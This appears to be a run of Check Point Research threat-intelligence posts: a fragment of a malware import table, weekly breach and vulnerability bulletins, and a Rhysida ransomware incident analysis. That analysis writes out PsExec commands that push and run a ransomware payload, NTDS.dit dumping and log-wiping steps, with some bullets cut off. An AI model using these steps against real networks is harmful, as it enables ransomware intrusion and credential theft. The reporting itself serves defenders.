0x26cfcec 0x7dd96dcb GetVolumeInformationA
0x26cfcf0 0x7dd75a96 GetSystemTime
0x26cfcf4 0x7dd73ed3 ReadFile
0x26cfcf8 0x7dd9d526 CreateDirectoryA
0x26cfcfc 0x7dd7110c GetTickCount_0
0x26cfd00 0x7dd73e8e lstrcmpiA
0x26cfd04 0x7dd9ab72 EnumResourceNamesA
0x26cfd08 0x7dd754ee FindNextFileW
0x26cfd0c 0x7ddf41df DisconnectNamedPipe
0x26cfd10 0x7dd74435 FindFirstFileW
0x26cfd14 0x7dd8eb39 ExpandEnvironmentStringsA
0x26cfd18 0x7dd75414 GetFileAttributesA
0x26cfd1c 0x7dd74220 WaitForMultipleObjects
0x26cfd20 0x7dd8d802 TerminateProcess_0
0x26cfd24 0x7dd74442 FindClose
0x26cfd28 0x7dded911 MoveFileA
0x26cfd2c 0x7dd753c6 CreateFileA
0x26cfd30 0x7ddf43af GetQueuedCompletionStatusEx
0x26cfd34 0x7dd789b3 DeleteFileW
0x26cfd38 0x7dd8ef29 PostQueuedCompletionStatus
0x26cfd3c 0x7dd74173 ExpandEnvironmentStringsW
0x26cfd40 0x7dd74407 GetFileTime
0x26cfd44 0x7dd71136 WaitForSingleObject
0x26cfd48 0x7dd716dd ResetEvent
0x26cfd4c 0x7dd71252 FlsGetValue
0x26cfd50 0x7dd717d1 SetFilePointer
0x26cfd54 0x7dd71700 lstrlenW_0
0x26cfd58 0x7dd8efec SwitchToThread
0x26cfd5c 0x77c69edf SetSecurityInfo
0x26cfd60 0x77c8077c LsaOpenPolicy
0x26cfd64 0x77c740e6 AllocateAndInitializeSid
0x26cfd68 0x77c740fe RegCreateKeyExW
0x26cfd6c 0x77c741b3 LookupPrivilegeValueW
0x26cfd70 0x77c7431c GetTokenInformation
0x26cfd74 0x77cb15a0 SetNamedSecurityInfoA
0x26cfd78 0x77c7469d RegCloseKey_0
0x26cfd7c 0x77c81af7 LsaClose
0x26cfd80 0x77c74620 InitializeSecurityDescriptor
0x26cfd84 0x77c7468d RegOpenKeyExW_0
0x26cfd88 0x77c714d6 RegSetValueExW
0x26cfd8c 0x77ca8819 LsaAddAccountRights
0x26cfd90 0x77cb15e9 SetEntriesInAclA
0x26cfd94 0x77c7412e FreeSid
0x26cfd98 0x77c7418e AdjustTokenPrivileges
0x26cfd9c 0x77cb187f GetExplicitEntriesFromAclA
0x26cfda0 0x77c715ad RegOpenCurrentUser
0x26cfda4 0x77c7157a GetUserNameW
0x26cfda8 0x77c7415e SetSecurityDescriptorDacl
0x26cfdac 0x77c60000 
0x26cfdb0 0x77c74304 OpenProcessToken
0x26cfdb4 0x77cb1554 GetNamedSecurityInfoA
0x26cfdb8 0x7deb01e3 
0x26cfdbc 0x7debd2f3 
0x26cfdc0 0x7dea9c70 
0x26cfdc4 0x7de922b0 
0x26cfdc8 0x7de70000 
0x26cfdcc 0x7deec240 
0x26cfdd0 0x7dea2265 
0x26cfdd4 0x7debc4ca 
0x26cfdd8 0x7dea45f5 
0x26cfddc 0x7de92340 
0x26cfde0 0x7de92270 
0x26cfde4 0x7debca3a 
0x26cfde8 0x7de9df20 
0x26cfdec 0x7dea2500 
0x26cfdf0 0x7dea2c42 
0x26cfdf4 0x7deebfa0 
0x26cfdf8 0x7dcbfd3f MessageBoxW
0x26cfdfc 0x7dcbfd1e MessageBoxA
0x26cfe00 0x7dc70a19 GetDesktopWindow
0x26cfe04 0x7dc8e061 wsprintfW
0x26cfe08 0x7dc50000 Ordinal2447
0x26cfe0c 0x7dc7ae5f wsprintfA
0x26cfe10 0x72589d0b CoCreateInstance
0x26cfe14 0x72540000 
0x26cfe18 0x72567259 CoInitializeSecurity
0x26cfe1c 0x725809ad CoInitializeEx
0x26cfe20 0x72555ea5 CoSetProxyBlanket
0x26cfe24 0x725886d3 CoUninitialize
0x26cfe28 0x6fc33e59 SysFreeString
0x26cfe2c 0x6fc34642 SysAllocString
0x26cfe30 0x6fc30000 Ordinal471
0x26cfe34 0x504b30 
0x26cfe38 0x504b58 
0x26cfe3c 0x535120 aAmdRyzen536006_0
0x26cfe40 0x1 
0x26cfe44 0x712175e8 InternetSetOptionA
0x26cfe48 0x7127a920 InternetGetLastResponseInfoA
0x26cfe4c 0xcc0004 
0x26cfe50 0x7121b406 InternetReadFile
0x26cfe54 0x712430f1 InternetOpenUrlA
0x26cfe58 0x7122f18e InternetOpenA
0x26cfe5c 0x71224c7d HttpOpenRequestA
0x26cfe60 0x712249e9 InternetConnectA
0x26cfe64 0x71200000 Ordinal367
0x26cfe68 0x7121ab49 InternetCloseHandle
0x26cfe6c 0x71211b56 InternetQueryOptionA
0x26cfe70 0x712918f8 HttpSendRequestA
0x26cfe74 0x6dc00000 
0x26cfe78 0x6dc2a9bc DnsQuery_A
0x26cfe7c 0x6dc0436b DnsFree
0x26cfe80 0x7d830000 
0x26cfe84 0x7d83647a BCryptVerifySignature
0x26cfe88 0x7d834d42 BCryptImportKey
0x26cfe8c 0x7d831fbc BCryptGenerateSymmetricKey
0x26cfe90 0x7d831b44 BCryptFinishHash
0x26cfe94 0x7d831a5f BCryptDestroyHash
0x26cfe98 0x7d831b93 BCryptCreateHash
0x26cfe9c 0x7d831b0b BCryptHashData
0x26cfea0 0x7d8318b8 BCryptDecrypt
0x26cfea4 0x7d83195c BCryptEncrypt
0x26cfea8 0x7d8320d4 BCryptSetProperty
0x26cfeac 0x7d83234e BCryptCloseAlgorithmProvider
0x26cfeb0 0x7d834f94 BCryptImportKeyPair
0x26cfeb4 0x7d83519b BCryptExportKey
0x26cfeb8 0x7d831ca7 BCryptGetProperty
0x26cfebc 0x7d831f40 BCryptDestroyKey
0x26cfec0 0x7d832d30 BCryptOpenAlgorithmProvider

The post Tunnel Warfare: Exposing DNS Tunneling Campaigns using Generative Models – CoinLoader Case Study appeared first on Check Point Research.

Old meets New as USB Devices and Artificial Intelligence are Exploited by Cybercriminals

The world of cybersecurity is constantly in flux, and understanding this ever-changing landscape is essential for businesses aiming to stay one step ahead of potential threats. The release of our 2023 Mid-Year Security Report shows some alarming trends, and novel insights into the ongoing war between cyber defense and cybercrime. The findings are based on data drawn from the Check Point ThreatCloud Cyber-Threat Map, which looks at the key tactics cybercriminals are using to carry out their attacks between January and June 2023.

Get Your Copy Of The Report

A Major Surge in Cyber Attacks

In the report, the Check Point Research (CPR) team points to a notable resurgence in cyber-attacks across the globe. The second quarter of the year alone saw an 8% rise in weekly cyber attacks – marking the most significant surge in the last two years. This startling trend illustrates the persistent and evolving nature of cyber threats, underscoring the need for businesses to continually adapt their security strategies.

Cybercriminals: Masters of Old and New

CPR’s report also sheds light on the fact that cybercriminals are not only exploiting the latest technologies but also turning to well-known vulnerabilities in established software to carry out their malicious activities. It´s not just the latest technology like AI that we need to be concerned about when it comes to cybersecurity. Cybercriminals are skillfully blending old and new techniques, creating a formidable challenge for security teams worldwide.

The Unsettling Evolution of Ransomware

One of the most chilling revelations from the report is the evolving landscape of ransomware. Data derived from over 120 ransomware “shame-sites” revealed that in the first half of 2023, a total of 48 ransomware groups reported breaching and publicly extorting more than 2,200 victims. It’s not just the veterans like Lockbit, Alphv, and Cl0p that are behind these attacks. New groups, including Royal, Play, BianLian, and BlackBasta, have emerged, increasing the threat landscape complexity.

Despite these concerning trends, CPR’s report isn’t all doom and gloom. It also offers hope, highlighting how AI-driven defenses can help organizations protect against both old and new threats. AI has the potential to identify anomalies and detect previously unseen attack patterns, mitigating potential risks before they escalate.

Cybersecurity: A Dynamic Battlefield

The key takeaway from CPR’s 2023 Mid-Year Security Report is that cybersecurity is a dynamic battlefield. It underscores the need for organizations to evolve their security strategies in tandem with the shifting threat landscape, employing a combination of the latest AI-driven defenses and a deep understanding of older vulnerabilities.

Check Point’s commitment to providing end to end cybersecurity solutions remains unwavering. As the threat landscape continues to evolve, so will our strategies and technologies to protect organizations worldwide. The full report is available here.

For more insights into cybersecurity, follow Check Point Research via their blog and Twitter.

Get Your Copy Of The Report

The post 2023 Mid-Year Cyber Security Report: Report Reveals 48 Ransomware Groups Have Breached Over 2,200 Victims appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 21st August, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The German Federal Bar (BRAK) Association, which oversees 28 regional bars throughout Germany and represents approximately 166,000 lawyers on a national and international scale, is currently investigating a ransomware attack on its Brussels office. NoEscape ransomware group claimed responsibility for this attack.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.NoEscape)

• Discord.io has confirmed that the company is handling a data breach exposing the information of 760,000 members, which led to the temporarily suspension of services. This comes after a cybercriminal going by the moniker Akihirah has posted the database of Discord in an underground forum.
• Colorado’s Department of Health Care Policy and Financing (HCPF) has released a notice that personal health data of about 4 million members of state health programs from IBM-managed systems has been obtained in Cl0p ransomware group’s third-party MOVEit attack during May 2023.

Check Point IPS blade, Harmony Endpoint and Threat Emulation provide protection against this threat (Progress MOVEit Transfer Multiple Vulnerabilities; Webshell.Win.Moveit, Ransomware.Win.Clop, Ransomware_Linux_Clop; Exploit.Wins.MOVEit)

• Suspected North Korean hackers, thought to have ties to a North Korean entity Kimsuky group, have targeted a joint U.S.-South Korea military exercise. Reportedly, no classified information was stolen.

Check Point Threat Emulation and Anti-Bot Blade provide protection against this threat (TrojanDownloader.Win.Kimsuky.A; Backdoor.WIN32.Kimsuky.A)

• Following a confidential data breach at Tesla, caused by two employees during May 2023 and affecting over 75K people, the company began notifying current and former employees that their information (Social Security numbers, names and addresses) has been exposed in the breach.
• Researchers have identified a widespread hacking campaign targeting LinkedIn accounts worldwide. They have noticed the attackers are using leaked credentials from 3^rd party websites, or brute-forcing to gain control of as many LinkedIn accounts as possible, leading to many victims have losing access to their accounts, with some even forced to pay ransoms to regain control to their accounts.
• Researchers have found a large-scale phishing campaign aiming to harvest Zimbra credentials, targeting small and medium businesses and governmental entities worldwide. The largest number of campaign’s victims are based in Poland, Ecuador, Mexico, Italy, and Russia.

VULNERABILITIES AND PATCHES

• Nearly 2,000 Citrix NetScaler servers have been compromised with a backdoor, leveraging the recently disclosed critical RCE vulnerability (CVE-2023-3519). This is part of a large-scale attack in which over 1,200 servers were backdoored before patch installation, and remain compromised without necessary checks for successful exploitation signs.

Check Point IPS provides protection against this threat (Citrix NetScaler Remote Code Execution (CVE-2023-3519))

• CISA has issued a warning regarding the critical Citrix ShareFile secure file transfer vulnerability (CVE-2023-24489), noting threat actors are actively targeting it. The agency has also included this vulnerability in its list of known security flaws exploited in the wild.

Check Point IPS provides protection against this threat (Citrix ShareFile StorageZones Controller Directory Traversal (CVE-2023-24489))

• Ivanti Avalanche, an enterprise mobility management solution, is affected by two critical buffer overflows collectively tracked as CVE-2023-32560. With a CVSS v3 rating of 9.8, the flaws can be exploited remotely without user authentication.

THREAT INTELLIGENCE REPORTS

• Check Point researchers discuss the security challenges faced by web server management and describe Turnstile – an alternative to CAPTCHA that offers a user-friendly approach to differentiate between human users and bots. The article warns that the same mechanisms that make Turnstile user-friendly also present a potential risk if exploited by malicious actors.

Check Point’s Zero Phishing AI provides protection against this threat.

• Trend Micro has analyzed the return of the Monti ransomware group after a two-month break, while the group is targeting now legal and government organizations. At the same time, the company has observed a new Linux-based variant, showing notable differences from previous Linux-based versions.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat.

• Several U.S. intelligence agencies have issued warnings about a rising trend of cyberattacks directed at American space firms by undisclosed foreign intelligence entities. These attacks primarily aim to gain proprietary data and have also been associated with instances of intellectual property misuse.
• Researchers report on a Chinese APT group (possibly Bronze Starlight) targeting gambling institutions in Southeast Asia. The group uses DLL sideloading to deliver malicious payloads in order to steal sensitive information from victims’ networks.

The post 21st August – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 14th August, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The Belt Railway Company of Chicago, the largest intermediate switching terminal railroad in the United States, is currently conducting an investigation into an attack executed by the Akira ransomware group. This group has included the company on its leak site, asserting the theft of 85 GB of data.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Akira.A; Trojan.Win.Krap.gl.D)

• The UK’s Electoral Commission, responsible for the voter registry, recently revealed a significant security breach. “Hostile actors” accessed their systems for over a year, spanning from August 2021 to October 2022. According to the commission, this breach potentially exposed the personal data of all UK citizens who registered to vote between 2014 and 2022.
• A recent report reveals that the Knight Ransomware, a variant of Cyclop Ransomware-as-a-Service, is currently spreading via an ongoing spam campaign using deceptive TripAdvisor complaint-themed emails to target unsuspecting users.
• Researchers have identified a cyberespionage group called ‘MoustachedBouncer’ using adversary-in-the-middle (AitM) attacks through Belarusian ISPs to target foreign embassies in Belarus. The report disclosed five separate campaigns, suggesting the threat actors have been operational since 2014, with AitM tactics used at Belarusian ISPs since 2020.
• The Department of Social Services (DCC) in Missouri has issued a cautionary notice regarding the exposure of protected Medicaid healthcare data due to a data breach. This incident occurred when IBM, which is a vendor that is providing services to DCC fell victim to a MOVEit data theft attack carried out by the Clop ransomware gang.
• Researchers have discovered an intrusion into a Russian missile engineering organization, NPO Mashinostroyeniya. Within this organization, they identified two instances of North Korea-related compromise of sensitive internal IT infrastructure, which included an email server, and the use of a Windows backdoor called OpenCarrot.
• The U.S. government released a report on the Lapsus$ hacking and extortion group, uncovering their predominant use of familiar tactics like SIM swapping, as well as exploiting known enterprise network vulnerabilities and technology provider protocols to access valuable data illicitly.

VULNERABILITIES AND PATCHES

• Microsoft outlined critical vulnerabilities in the CODESYS V3 software development kit (SDK). These vulnerabilities impact all versions before 3.5.19.0, posing significant risks to operational technology infrastructure, including the potential for RCE and DoS attacks.
• Researchers discovered a vulnerability in Microsoft’s Visual Studio Code (VS Code) code editor and development environment concerning the handling of secure token storage. Malicious extensions can exploit it to access authentication tokens stored within Windows, Linux, and macOS credential managers.
• Ford has issued an alert about a buffer overflow vulnerability (CVE-2023-29468) in its widely-used SYNC3 infotainment system, potentially enabling remote code execution. However, the company assures that this vulnerability doesn’t impact vehicle driving safety.

THREAT INTELLIGENCE REPORT

• Check Point Research shared information about modus operandi of Rhysida ransomware group, based on recent CPIRT response on Rhysida attack against an educational institution. The report also highlights significant similarities of Rhysida group to Vice Society ransomware, which mostly targeted education and healthcare since 2021.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Rhysida, Ransomware.win.honey; Ransomware.Wins.Rhysida)

• Check Point Research reports that, over the last four weeks, approximately 1 in 29 healthcare organizations in the United States were attacked by ransomware. Healthcare currently holds the unfortunate distinction of being the most affected industry by ransomware. In 2022, the healthcare sector witnessed a staggering 78% surge in cyberattacks, with an average of 1,426 attempted attacks per week per organization.
• Check Point Research’s July Most Wanted Malware Report unveils that Remcos RAT rose to third place, due to malicious downloaders carrying RAT distributed through fake websites last month. Anubis, the mobile banking Trojan, dethrones SpinOk from the top spot in mobile malware.
• Researchers have discovered a LATAM-focused threat actor targeting FinTech users. This campaign employs a modified BX RAT called JanelaRAT, utilizing diverse TTPs, including DLL side-loading, dynamic C2 infrastructure, and a multi-stage attack approach.
• In a globally coordinated operation led by INTERPOL, a well-known ‘phishing-as-a-service’ (PaaS) platform named ’16shop’ has been dismantled. The platform’s operator and a facilitator were apprehended by Indonesian authorities, while another individual was arrested in Japan.

The post 14th August – Threat Intelligence Report appeared first on Check Point Research.

Introduction

The Rhysida ransomware group was first revealed in May this year, and since then has been linked to several impactful intrusions, including an attack on the Chilean Army. Recently the group was also tied to an attack against Prospect Medical Holdings, affecting 17 hospitals and 166 clinics across the United States. After this attack, the US Department of Health and Human Services defined Rhysida as a significant threat to the healthcare sector.

While responding to a recent Rhysida ransomware case against an educational institution, the Check Point Incident Response Team (CPIRT), in collaboration with Check Point Research (CPR), observed a set of unique Techniques, Tactics and Tools (TTPs). During our analysis, we identified significant similarities to the TTPs of another ransomware group – Vice Society. Vice Society was one of the most active and aggressive ransomware groups since 2021, mostly targeting the education and healthcare sectors. For example, Vice Society was responsible for the attack against the Los Angeles Unified School District.

As a connection between Vice Society and Rhysida was suggested recently, we bring forth technical evidence to strengthen the connection. Our analysis shows both a technical similarity between the two groups, and a clear correlation between the emergence of Rhysida and the disappearance of Vice Society. In addition, the two groups share a focus on two main sectors which stand out in the ransomware ecosystem: education and healthcare.

As Vice Society was observed deploying a variety of commodity ransomware payloads, this link does not suggest that Rhysida is exclusively used by Vice Society, but shows with at least medium confidence that Vice Society operators are now using Rhysida ransomware.

Tactics, Techniques and Procedures

As the Rhysida ransomware payload was thoroughly analyzed before, we will focus on the TTPs leading to its deployment, specifically on Lateral Movement, Credential Access, Defense Evasion, Command and Control, and Impact.

Based on the evidence we have, the time to ransom (TTR) of the actors employing Rhysida ransomware is relatively low. It has been eight days from the first signs of lateral movement to the widespread ransomware deployment.

Lateral Movement

The attackers used a variety of tools to perform lateral movement, including:

• PsExec.exe -d \VICTIM_MACHINE -u “DOMAIN\ADMIN” -p “Password” -s cmd /c COPY “\path_to_ransomware\payload.exe” “C:\windows\temp”
• PsExec.exe -d \VICTIM_MACHINE -u “DOMAIN\ADMIN”” -p “Password” -s cmd /c c:\windows\temp\payload.exe.

Credential Access

Most notably, the threat actor used ntdsutil.exe to create a backup of NTDS.dit in a folder name temp_l0gs. This path was utilized by the actor multiple times. In addition to those, the threat actor has enumerated Domain Administrator accounts and attempted to log in using some of them.

Command and Control

The threat actors have utilized several backdoors and tools for persistence, including:

• here) which maintains persistence by installing a registry run key named socks to execute the script on startup. The implant reaches out to 5.255.103[.]7.
• Windows Update to allow outbound traffic to another server, 5.226.141[.]196.

Defense Evasion

Throughout the activity, the threat actors consistently deleted logs and forensic artifacts following their activity. This includes:

Following RDP sessions, the threat actor also deleted RDP-specific logs by:

• HKCU:\Software\Microsoft\Terminal Server Client” in the Windows Registry, and for each subkey, removing the “UsernameHint” value if it exists.
• \Default.rdp from the users’ Documents folder.

Impact

On the day of ransomware deployment, the threat actor utilized the access provided by AnyDesk to widely deploy the ransomware payload in the environment using PsExec:

• • wmic.exe and vssadmin.exe.

The Vice Society Connection

Throughout our analysis of Rhysida ransomware TTPs and infrastructure, we found several similarities to another infamous ransomware group: Vice Society, which was observed changing ransomware payloads over time. A possible link between Vice Society and Rhysida has been recently suggested. Here we will present additional evidence supporting this claim.

Techniques, Tools and Infrastructure

Many of the techniques described above are highly correlated with previous Vice Society intrusions as described by Microsoft and Intrinsec. Some of them might appear quite generic for Ransomware operators, but were utilized in very specific ways, including specific paths, which are not common:

• temp_l0gs. The same path was reported to be used by Vice Society.
• New-NetFirewallRule named Windows Update to facilitate traffic relaying using SystemBC, a commodity malware. SystemBC was executed through the registry Run key, stored under the value socks.

Victimology

In addition to technical similarity, there is also a correlation between the emergence of Rhysida and a significant decline in Vice Society activity. Based on information from both Rhysida and Vice Society leak sites, we constructed a timeline displaying extortion announcements of the two groups.

Ever since Rhysida first appeared, Vice Society has only published two victims. It’s likely that those were performed earlier and were only published in June. Vice Society actors stopped posting on their leak site since June 21, 2023.

In addition, we also noticed similarities in the targeted sectors affected by the two groups, who are well known for targeting the education and healthcare industries. The high portion of victims in the education industry stands out as unique for both groups in the entire ransomware ecosystem:

Figure 2 – Distribution of Rhysida victims per industry sector

Figure 3 – Distribution of Vice Society victims per industry sector

Conclusion

Our analysis of Rhysida ransomware intrusions reveals clear ties between the group and the infamous Vice Society, but it also reveals a grim truth – the TTPs of prolific ransomware actors remain largely unchanged. Major portions of the activity we’ve observed could have been used, and have been used, to deploy any ransomware payload by any ransomware group.

This highlights the importance of understanding not just the operation of a ransomware payload, but the entire process leading to its deployment. From the usage of remote management tools such as AnyDesk to the deployment of ransomware through PsExec, threat actors leverage a variety of tools to facilitate such attacks. Closely monitoring the activity of those could help in preventing the next ransomware attack.

Check Point Software customers remain protected against Rhysida ransomware.

Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics and file types and is protecting against the type of attacks and threats described in this report.

The post The Rhysida Ransomware: Activity Analysis and Ties to Vice Society appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 7th August, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• Prospect Medical Holdings, a major healthcare services provider that operates 16 hospitals and 166 outpatient clinics and centers in the US, suffered a significant ransomware attack. The attack has disrupted the company’s operations in at least three states, and forced hospitals to divert patients to other facilities. No ransomware gang has publicly claimed responsibility for the attack yet.
• Serco Inc, a contractor of the US government, has suffered a data breach that affected the personal information of over 10K individuals. The compromised data has been stolen from a third-party vendor’s MoveIT managed file transfer (MFT) server and consists of names, US Social Security numbers, date of birth, email address, health benefits information and more.
• The American video game giant Activision, which is the creator of ‘Call of Duty’ online game, has allegedly experienced a cyber-attack and took ‘Call of Duty’ (Modern Warfare 2) game offline as a precaution. Researchers investigated and found that Call of Duty players have been hit with malware that automatically spreads through multiplayer lobbies.
• The American apparel retailer, Hot Topic, has confirmed a possible data breach that potentially resulted in the exposure of clients’ personal information. The breach was due to credential-stuffing attacks that occurred between February 7^th and June 21^st this year. The stolen data consists of full names, email addresses, orders history, phone numbers, four last digits of saved payment cards and more.
• The Colorado Department of Higher Education (CDHE) has disclosed a data breach that exposed the data of employees and students who attended a public high school, college or university in the state over a period of more than a decade leading up to 2020. The stolen data includes personal information such as full names, US Social Security numbers, student identification numbers, and other education records.
• Kenya’s government has been a victim of a massive DDOS (Distributed Denial of Service) attack that impacted the eCitizen portal that serves as a platform for the public to access over 5,000 government services. The attack was conducted by the Russia affiliated hacktivists group Anonymous Sudan.
• LockBit ransomware gang has claimed responsibility for a cyber-attack on West Oaks School, a school for children with special educational needs in England. The threat actors allegedly gained access to the school’s databases, however, currently the scope of the event is still unclear.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Lockbit; Ransomware.Wins.Lockbit)

VULNERABILITIES AND PATCHES

• Microsoft fixes a security issue that could lead to an unauthorized access to Custom Code functions used for Power Platform custom connectors. This issue can lead to an information disclosure of sensitive information that was embedded in the Custom Code function.
• Mozilla has released patches for several vulnerabilities in Firefox 116, of which nine flaws are rated with high severity. Among the fixed vulnerabilities is the Stack buffer overflow in StorageManager flaw (CVE-2023-4050) which could result in a potentially exploitable crash which could lead to a sandbox escape.
• PaperCut has patched a critical security vulnerability (CVE-2023-39143) in its NG/MF print management software. Successful exploitation could allow an unauthenticated attacker to perform remote code execution on unpatched PaperCut servers running on Windows.

THREAT INTELLIGENCE REPORT

• Check Point researchers share the latest findings of NPM-based vulnerabilities that were discovered in over 50 popular packages, putting countless projects and organizations at risk.

Check Point CloudGuard CNAPP provides protection against this threat

• Researchers have identified social engineering attack campaign that uses credential theft phishing lures sent as Microsoft Teams chats, conducted by the Russian APT29 (aka Midnight Blizzard, NOBELIUM, Cozy Bear). The APT group uses Teams user profiles taken from previously compromised small-businesses and tricks users into approving multifactor authentication (MFA) prompts, aiming to steal credentials from targeted organizations.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (APT.Win.APT29; APT.Wins.APT29)

• A novel phishing tactic leverages Google Accelerated Mobile Pages (AMP), an open-source HTML framework, to embed malicious links within their phishing emails. Hosted on trusted domains, these links have proven highly effective in targeting enterprise employees, making detection more challenging.
• Researchers have discovered an AI-driven malicious tool called FraudGPT, which has emerged two weeks after WormGPT in the darkweb. This malicious tool is being promoted as an “exclusive bot” used for offensive activities such as crafting spear phishing emails, creating cracking tools, carding, and more; all this without real proofs to its success yet.
• An Android malware dubbed SpyNote is actively targeting multiple European banking clients in a widespread campaign. The malware is spread through phishing or smishing campaigns, while fraudulent activities utilize a combination of remote access Trojan (RAT) capabilities and phishing attacks.

The post 7th August – Threat Intelligence Report appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 31st July, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The Norwegian government has reported that a software platform, used by 12 key ministries, suffered a cyberattack. It happened after hackers exploited a zero-day authentication bypass vulnerability in Ivanti’s Endpoint Manager Mobile (EPMM).
• Maximum, a contractor providing services to the U.S. government, including federal and local healthcare programs and student loan servicing, disclosed a data breach linked to Cl0p’s MOVEit attack. The breach compromised personal information of more than 8 million customers.

Check Point IPS blade, Harmony Endpoint and Threat Emulation provide protection against this threat ((Progress MOVEit Transfer Multiple Vulnerabilities); Webshell.Win.Moveit, Ransomware.Win.Clop, Ransomware_Linux_Clop; Exploit.Wins.MOVEit)

• The Hawaii Community College has acknowledged paying a ransom to ransomware actors to thwart the leakage of personal information of 28,000 individuals. NoEscape ransomware gang claimed responsibility for this attack.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.NoEscape, Ransomware_Linux_NoEscape)

• Security researchers have recently uncovered a campaign they assess might be tied to the North Korean APT37 group. In this campaign, threat actors employed counterfeit US military job-recruitment documents as bait to entice individuals into downloading malware hosted on legitimate, yet compromised Korean websites.

Check Point Harmony Endpoint provides protection against this threat (APT.Win.APT37)

• Estonian crypto-payments service provider CoinsPaid has announced that it experienced a cyber-attack on July 22^nd that resulted in the theft of $37,200,000 worth of cryptocurrency. CoinsPaid is blaming the attack on the North Korean hacking group Lazarus.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (APT.Win.Lazarus)

• NATO is investigating an alleged data-theft hack on its unclassified information-sharing platform, the COI Cooperation Portal (dnbl.ncia.nato.int). The SiegedSec group claimed responsibility for the attack.
• Researchers have revealed a deceptive installer posing as a genuine Microsoft Visual Studio installer, delivering a Cookie Stealer. This installer is distributed through various deceptive methods like phishing websites, third-party platforms, social engineering, and misleading ads.

VULNERABILITIES AND PATCHES

• Ivanti, a US-based IT Software Company, has recently addressed an actively exploited zero-day authentication bypass vulnerability affecting its Endpoint Manager Mobile (EPMM) mobile device management software (previously known as MobileIron Core).

Check Point IPS Blade provides protection against this threat (Ivanti Endpoint Manager Mobile Authentication Bypass (CVE-2023-35078))

• CISA released five Industrial Control Systems advisories that provide timely information about current security issues, vulnerabilities, and exploits.
• Researchers have recently published a comprehensive list of vital security updates and vulnerability patches for WordPress.

THREAT INTELLIGENCE REPORTS

• Check Point researchers have revealed vulnerabilities in internet-connected workout equipment, including popular brands like Peloton. Exploiting those vulnerabilities could potentially provide threat actors with access to user databases, thereby exposing sensitive data of Peloton users.
• Researchers have discovered two new related Android malware families, dubbed CherryBlos and FakeTrade, which are involved in cryptocurrency mining and financially motivated scam campaigns targeting Android users.
• Researchers have identified a malicious phishing campaign attempting to deploy the notorious Agent Tesla infostealer. The campaign utilizes malspam techniques, disguising the malicious payload as a price quotation request from a seemingly legitimate South Korean company within the mining and metals industry.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (InfoStealer.Win.Agenttesla; Technique.Win.LinkRemote.la.*)

• Security researchers found a new initial-access campaign called ‘Nitrogen’ that misuses Google and Bing ads to target users searching for certain IT tools. The campaign aims to gain entry into enterprise environments to deploy further malware, possibly ransomware.
• Researchers have uncovered a new campaign involving the installation of the PurpleFox malware on poorly managed MS-SQL servers. PurpleFox facilitates the downloading of various second-stage payloads.

The post 31st July – Threat Intelligence Report appeared first on Check Point Research.

Between corporations, governments, and the rest of us, billions are spent every year trying to secure cyberspace. Which makes it almost unbelievable to think that just one, simple policy change from one company — with almost no cost to anybody, and no effort involved — could alter the entire course of cyberspace. And yet, that is exactly what happened a year ago today.  

The post How Microsoft Changed Cyberspace With One Decision appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 24th July, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• The Microsoft Exchange email account espionage campaign, which has been attributed to Chinese threat actor ‘Storm-0558’, has reportedly accessed the email account of United States ambassador to China and compromised hundreds of thousands of individual United States government emails. Researchers warn that the method used in the campaign could also have targeted user accounts other Microsoft services, such as OneDrive and Azure environments.
• Tampa General Hospital in Florida, United States, has announced that confidential information of 1.2 million patients of the hospital has been disclosed in a cyber-attack. The data includes identifying details such as names, addresses and Social Security numbers, as well as medical history and treatment information. Ransomware group Snatch has claimed responsibility for the attack and posted the data to its leak site.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Snatch)

• American cosmetics giant Estée Lauder has stated that its network had been accessed by a third party in a cybersecurity incident, and that data had been stolen by the attackers. Two separate ransomware groups, Black Cat (ALPHV) and Cl0p, have each claimed to have compromised the company and are threatening to disclose the exfiltrated data if not paid ransom.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats (Ransomware.Win.BlackCat, Ransomware.Win.Clop, Ransomware_Linux_Clop)

• Norwegian mining and recycling corporation TOMRA has been forced to shut down parts of its network and some of its offices after discovering that a threat actor had gained access to its systems. The company claims that it is unaware of any ransom demands or data encryption.
• Software development platform GitHub has found a social engineering campaign targeting technology firm employees on the platform. According to GitHub, North Korean APT group Lazarus aimed to gain users’ trust to ‘collaborate’ on a shared repository, which would deliver malware once run.
• Malware sharing platform VirusTotal has posted a public apology after it has been revealed that a list containing information of more than 5,000 of the site’s customers has been shared online. According to VirusTotal, the list was leaked as result of employee human error.

VULNERABILITIES AND PATCHES

• Citrix has published a security advisory addressing CVE-2023-3519, a critical unauthenticated remote code execution zero-day vulnerability affecting its ADC and gateway products. According to security researchers, the vulnerability has already been exploited in the wild by Chinese APT groups, while others say that the exploits have been available for purchase on the dark web.

Check IPS blade provides protection against this threat (Citrix NetScaler Remote Code Execution (CVE-2023-3519))

• Adobe has released an out-of-band security update addressing 3 vulnerabilities in Adobe ColdFusion. Among the vulnerabilities are CVE-2023-38204, a critical remote code execution vulnerability, and CVE-2023-38205, a critical security bypass vulnerability which has been exploited in the wild.
• Oracle has published its July critical patch advisory. This month’s patch includes fixes for more than 500 security vulnerabilities affecting a wide array of Oracle products.
